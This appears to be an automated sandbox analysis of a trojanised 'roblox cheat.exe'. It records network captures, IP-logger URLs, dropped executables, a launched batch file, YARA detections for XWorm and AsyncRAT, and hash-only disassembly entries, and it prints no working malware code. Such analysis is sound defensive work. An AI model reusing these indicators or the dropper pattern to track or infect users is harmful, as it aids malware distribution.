                                                                                2024-07-29 22:54:48 UTC459INHTTP/1.1 200 OK
                                                                                Server: nginx/1.17.9
                                                                                Date: Mon, 29 Jul 2024 22:54:48 GMT
                                                                                Content-Type: image/gif
                                                                                Content-Length: 445
                                                                                Connection: close
                                                                                Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                                Pragma: no-cache
                                                                                Cache-control: no-cache
                                                                                P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                                Set-Cookie: FTID=0; path=/; expires=Sat, 01 Jan 2000 00:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                                Access-Control-Allow-Origin: *
                                                                                Strict-Transport-Security: max-age=86400
                                                                                2024-07-29 22:54:48 UTC445INData Raw: 47 49 46 38 37 61 1f 00 1f 00 d5 00 00 02 02 02 82 56 06 da be 86 42 2e 0a c2 82 02 22 1a 06 a2 6a 06 32 26 08 62 42 06 de ae 42 fa de a1 b2 76 02 5a 4e 3e ea a2 16 2a 26 1a ee d6 aa 52 36 06 2a 22 0a da a2 2a 3a 26 08 94 62 06 da 92 02 a6 72 12 26 22 0b ac 72 02 4a 2e 0a ca 86 02 72 4a 06 fe de 9e ba 7a 02 f2 de ae 24 1e 0e 36 26 08 fe de 9a fe ba 32 fe c6 52 fe aa 02 5e 3e 08 8e 5e 06 9e 6a 06 7e 52 06 f2 da b2 4e 36 0a 6a 46 06 f7 de a6 26 1e 0a a5 6e 02 f2 da ae 56 3a 0a 3e 2a 08 de 96 06 4e 32 06 86 5a 06 46 2e 06 c6 86 02 b6 7a 02 2e 22 08 96 66 06 ae 76 02 ce 8a 02 76 4e 06 bc 7e 02 f6 de aa c6 82 02 2c 00 00 00 00 1f 00 1f 00 00 06 e2 c0 10 67 a8 28 16 59 48 96 6f e9 f3 bc 9e d0 94 54 fa 48 84 46 a4 ac 76 cb ed 76 1b 94 ab 77 4c d6 6a c2 d8 b2 9a
                                                                                Data Ascii: GIF87aVB."j2&bBBvZN>*&R6*"*:&br&"rJ.rJz$6&2R^>^j~RN6jF&nV:>*N2ZF.z."fvvN~,g(YHoTHFvvwLj


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.949733104.21.4.2084437716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-29 22:54:48 UTC351OUTGET /favicon.ico HTTP/1.1
                                                                                Host: cdn.iplogger.org
                                                                                Connection: keep-alive
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: none
                                                                                Sec-Fetch-Mode: cors
                                                                                Sec-Fetch-Dest: empty
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                2024-07-29 22:54:48 UTC759INHTTP/1.1 200 OK
                                                                                Date: Mon, 29 Jul 2024 22:54:48 GMT
                                                                                Content-Type: image/x-icon
                                                                                Content-Length: 2833
                                                                                Connection: close
                                                                                last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                                etag: "629f3a26-b11"
                                                                                strict-transport-security: max-age=31536000
                                                                                x-frame-options: SAMEORIGIN
                                                                                Cache-Control: max-age=14400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 6366
                                                                                Accept-Ranges: bytes
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LlKuTq5MIOzsT7q0gS7PJe7XWG%2Bwchx4rrpXe5H1kfljJ%2FVD3t8UUuJzvSvcrny8B03yyiD6Kg6oKzkLuDCxfi%2FLYQXIy27lyQYMY9WtqugPo0S%2BcwB1eQROimDuru9%2FFdhA"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ab0b15ebc191a1b-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                2024-07-29 22:54:48 UTC610INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa
                                                                                Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
                                                                                2024-07-29 22:54:48 UTC1369INData Raw: 0b 78 0a 38 08 4c 21 a7 a6 0b 38 13 b8 06 61 56 23 bc 0a 7c 3e 15 52 13 b3 fd 39 2b 03 bc e9 bc 0f 09 50 1a 1e a1 1a 98 04 7e 09 dc 5e 8a 06 f7 3b 3f fa 23 71 90 e3 b9 14 d9 c9 0e 64 87 47 80 61 60 a4 98 49 b8 f2 f5 63 39 dd 06 5c 0a dc 43 63 27 2c 09 6c 9d 2d ca ac c5 80 eb cd c0 cd e0 6d e4 48 ef 2e 45 83 ce a2 bb 81 0b 80 73 11 73 b5 98 e9 3a a0 6c 3e c3 c0 d5 c5 4c e2 05 00 ad 75 1b b2 db 67 23 51 e4 08 30 00 3c a5 94 1a 33 9a 7e 3d 62 9a eb b9 c5 93 c0 da 54 48 ed 99 f9 c7 87 18 e0 4d e7 bb 11 f7 f6 18 d7 4b ae e0 61 e0 da 52 34 38 0e e0 8f c4 57 02 5b 81 af 36 98 a0 83 3f 00 e7 16 33 89 29 ad f5 72 e0 57 48 64 38 13 07 81 6f 28 a5 5e 02 88 e5 f4 8d c0 5d 0d c6 7e 15 38 65 66 34 39 8d 01 46 eb ff 0c b8 c4 c5 64 ab 51 46 16 7a 67 29 1a 2c fb 23 f1 45
                                                                                Data Ascii: x8L!8aV#|>R9+P~^;?#qdGa`Ic9\Cc',l-mH.Ess:l>Lug#Q0<3~=bTHMKaR48W[6?3)rWHd8o(^]~8ef49FdQFzg),#E
                                                                                2024-07-29 22:54:48 UTC854INData Raw: 80 8b 90 5d 1f 02 9e ab 1e 78 26 03 f6 21 b6 dd 16 97 63 62 84 62 26 f1 1e 70 16 92 d9 6d 45 3b eb 7e e0 4b c0 b7 8b 99 c4 64 b2 a0 bb 80 67 99 bd 4d cf 83 e4 fc ff 0a dc 9e 2c e8 2e a3 1f d2 48 0a 6c 93 c9 1c 1d c5 6c e5 f1 15 88 97 e4 36 de 9f 00 ce 2e 45 83 bb 7a 07 46 3d 80 2f 1b ee 9c 00 30 85 d2 9b 90 82 ab 6d b9 fd 00 f0 43 e0 a1 62 26 71 04 20 59 d0 3d 88 b2 76 eb f2 1e 44 aa d4 a9 fe c0 ec 4d d6 b5 1a 24 6e c6 5d 6f 90 d3 df f3 70 e8 e3 8b 41 3a 36 6e 40 52 da bb b2 e1 4e a7 41 22 80 14 25 23 88 e5 58 86 ec 96 a7 6a 9c 29 c4 b1 1a 44 76 78 67 95 99 23 59 d0 01 20 4b 73 3d 8a 83 c0 19 fd 81 0f b7 c9 d4 ca 06 6d 47 ec 6a a3 2a ef 76 e0 e1 52 34 08 03 a3 5f 40 76 6c 11 92 d4 dc d1 3b 30 ba 0d d8 9b 0d 77 16 10 65 f9 a8 3f 12 f7 21 a7 61 99 b9 3a 2d
                                                                                Data Ascii: ]x&!cbb&pmE;~KdgM,.Hll6.EzF=/0mCb&q Y=vDM$n]opA:6n@RNA"%#Xj)Dvxg#Y Ks=mGj*vR4_@vl;0we?!a:-


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.949734184.28.90.27443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-29 22:54:48 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept: */*
                                                                                Accept-Encoding: identity
                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                Range: bytes=0-2147483646
                                                                                User-Agent: Microsoft BITS/7.8
                                                                                Host: fs.microsoft.com
                                                                                2024-07-29 22:54:48 UTC515INHTTP/1.1 200 OK
                                                                                ApiVersion: Distribute 1.1
                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                Content-Type: application/octet-stream
                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                Server: ECAcc (lpl/EF06)
                                                                                X-CID: 11
                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                X-Ms-Region: prod-weu-z1
                                                                                Cache-Control: public, max-age=202140
                                                                                Date: Mon, 29 Jul 2024 22:54:48 GMT
                                                                                Content-Length: 55
                                                                                Connection: close
                                                                                X-CID: 2
                                                                                2024-07-29 22:54:48 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.96076420.12.23.50443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-29 22:55:19 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=USNpFfLxfLR8zud&MD=tboVBsUh HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept: */*
                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                Host: slscr.update.microsoft.com
                                                                                2024-07-29 22:55:19 UTC560INHTTP/1.1 200 OK
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                Content-Type: application/octet-stream
                                                                                Expires: -1
                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                MS-CorrelationId: dd266115-2da5-432c-b94c-18d4ab9738c9
                                                                                MS-RequestId: c8f41c42-879e-45b3-9978-e9b8e735b255
                                                                                MS-CV: XwQXl5k/1kSqWqc3.0
                                                                                X-Microsoft-SLSClientCache: 1440
                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                X-Content-Type-Options: nosniff
                                                                                Date: Mon, 29 Jul 2024 22:55:19 GMT
                                                                                Connection: close
                                                                                Content-Length: 30005
                                                                                2024-07-29 22:55:19 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                2024-07-29 22:55:19 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:18:54:24
                                                                                Start date:29/07/2024
                                                                                Path:C:\Users\user\Desktop\roblox cheat.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\roblox cheat.exe"
                                                                                Imagebase:0x910000
                                                                                File size:6'410'752 bytes
                                                                                MD5 hash:6B94734FEAC8EDB9F925385163AD59C9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:2
                                                                                Start time:18:54:24
                                                                                Start date:29/07/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe"
                                                                                Imagebase:0xa20000
                                                                                File size:5'720'984 bytes
                                                                                MD5 hash:27469372591B14FF1C57654FACB5E020
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Antivirus matches:
                                                                                • Detection: 0%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:3
                                                                                Start time:18:54:24
                                                                                Start date:29/07/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe"
                                                                                Imagebase:0x7ff754540000
                                                                                File size:630'062 bytes
                                                                                MD5 hash:FC411F4D9F4DBA5104CB1549153A8684
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 61%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:4
                                                                                Start time:18:54:26
                                                                                Start date:29/07/2024
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "
                                                                                Imagebase:0x7ff6802f0000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:5
                                                                                Start time:18:54:26
                                                                                Start date:29/07/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff70f010000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:6
                                                                                Start time:18:54:36
                                                                                Start date:29/07/2024
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:cmd
                                                                                Imagebase:0x7ff6802f0000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:7
                                                                                Start time:18:54:36
                                                                                Start date:29/07/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff70f010000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:9
                                                                                Start time:18:54:37
                                                                                Start date:29/07/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6
                                                                                Imagebase:0x7ff6b2cb0000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:12
                                                                                Start time:18:54:39
                                                                                Start date:29/07/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1860 --field-trial-handle=1928,i,13588240422126798521,8416605528282741341,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff6b2cb0000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Executed Functions

                                                                                  Function 01A5164C Relevance: 1.1, Instructions: 1079COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: eae3e544fc0c88a27e752672e2fc98ab729e13e68aee0e20f4b534476427e410
                                                                                  • Instruction ID: fcc128346b224c82ef692a98708ac983a61900a952c56c0cf6a02b52412c2caf
                                                                                  • Opcode Fuzzy Hash: eae3e544fc0c88a27e752672e2fc98ab729e13e68aee0e20f4b534476427e410
                                                                                  • Instruction Fuzzy Hash: 5BA2E370C68369CFDBA69F34C8822CAB7F0FF56724B14845ED891AD65DD7324902CB89
                                                                                  Function 01A509B0 Relevance: .4, Instructions: 449COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 24f4c8e44bc9df20ee4f975f16a89daecbe19f02e239dab181bc933a5f0ddb0a
                                                                                  • Instruction ID: 76712ad67ad3e085b87a40651690a35d16c77e5cc4f5751c1e88b1850153eb86
                                                                                  • Opcode Fuzzy Hash: 24f4c8e44bc9df20ee4f975f16a89daecbe19f02e239dab181bc933a5f0ddb0a
                                                                                  • Instruction Fuzzy Hash: D83268B4A01229CFDBA4DFA9D994B9DBBB1BB49300F1181EAD91DA7354DB305E84CF10
                                                                                  Function 01A57AFF Relevance: .3, Instructions: 345COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ec13edc29c1da0966b93678f08a251d877518ced7ad2c79d770a95aaa8399576
                                                                                  • Instruction ID: 3013a15e6b6551a8f806b24350c7bb1fd3d358183211b40cd757448e3104d89b
                                                                                  • Opcode Fuzzy Hash: ec13edc29c1da0966b93678f08a251d877518ced7ad2c79d770a95aaa8399576
                                                                                  • Instruction Fuzzy Hash: C6D16D31A042058FDB66DFA8D854BAE7BF2FF88300F144529D546AB394DB349C46DBA1
                                                                                  Function 01A592D8 Relevance: .2, Instructions: 227COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e765975fe494f2ad97240aacf8422cf36a3c5a3ee71bf30d526f55154af3862e
                                                                                  • Instruction ID: a385b0df823ffb7b88bb41ac292532583c8c17116ee3e1714acdfbcf2a617cf4
                                                                                  • Opcode Fuzzy Hash: e765975fe494f2ad97240aacf8422cf36a3c5a3ee71bf30d526f55154af3862e
                                                                                  • Instruction Fuzzy Hash: 2B71C130B08201CFEB5A9BB9A45863F3BBBAFC4644719442DD906CF386DE34CC069791
                                                                                  Function 01A597AB Relevance: .2, Instructions: 191COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a82601b996226ad5c1ebb364bc56d4a4850cfaea6a1547b89fadaab208146170
                                                                                  • Instruction ID: e350ef356eeea30d7126f70fcb825562adcd13d7b1543ae69d733b3e94d40c06
                                                                                  • Opcode Fuzzy Hash: a82601b996226ad5c1ebb364bc56d4a4850cfaea6a1547b89fadaab208146170
                                                                                  • Instruction Fuzzy Hash: 5651F031B093009FDB559FB9D85566EBBF6BFCA210B19846EE806CB395CA318C06C791
                                                                                  Function 01A595A8 Relevance: .2, Instructions: 178COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: db3c73bdb13a0cd14502bd626b9153d85ade996ebdf2b520d987b00de7b0b004
                                                                                  • Instruction ID: a51a54b67850554c90d4a30b0756b1d58e63b5b78ef8fffaf1fb412430b50b98
                                                                                  • Opcode Fuzzy Hash: db3c73bdb13a0cd14502bd626b9153d85ade996ebdf2b520d987b00de7b0b004
                                                                                  • Instruction Fuzzy Hash: 85519B38346651CFC76B9F79A42843E76B6BB8AA01349805EE852DF398CF345C07DB91
                                                                                  Function 01A5D600 Relevance: .1, Instructions: 64COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d4a192c391199975bdd1578a32710bccbb2c7f0ad06f2b0c437fa521752fd556
                                                                                  • Instruction ID: a9c1cf4f91b4776221508e199c8936c3d93222896ac7520d418f6d9f5f0ab38e
                                                                                  • Opcode Fuzzy Hash: d4a192c391199975bdd1578a32710bccbb2c7f0ad06f2b0c437fa521752fd556
                                                                                  • Instruction Fuzzy Hash: 36210574E002098FDB04CFA9D9849EEBBF1FF89300F10856AD914AB261DB345A45CF60
                                                                                  Function 01A59D38 Relevance: .1, Instructions: 58COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9f2257961b566dcfd58878c2a184356d4bf4b070502d6a2c1532ec0462a3d282
                                                                                  • Instruction ID: f89bb3bfeea3b41b2d02fb87be6f1fd66bda5686bfc7200f6720687b2eeae0ad
                                                                                  • Opcode Fuzzy Hash: 9f2257961b566dcfd58878c2a184356d4bf4b070502d6a2c1532ec0462a3d282
                                                                                  • Instruction Fuzzy Hash: ED1104317092448FD7154BB9D8586ABBBFBBFCA200B19847BE406CB359CE348C0A9761
                                                                                  Function 01A5D610 Relevance: .1, Instructions: 58COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ff80c9071438ed849410ab2ec55f7cbb13fa66844ec3d729f64c62675f7eaace
                                                                                  • Instruction ID: b77f3e1a087e6b2cae5e27eba9424aeb7272b8965e77f21785eb96c0e744c7a2
                                                                                  • Opcode Fuzzy Hash: ff80c9071438ed849410ab2ec55f7cbb13fa66844ec3d729f64c62675f7eaace
                                                                                  • Instruction Fuzzy Hash: A021B474E002098FDB04DFA9D544AEEBBF5FB8D300F10856AD915AB350DB359A45CFA1
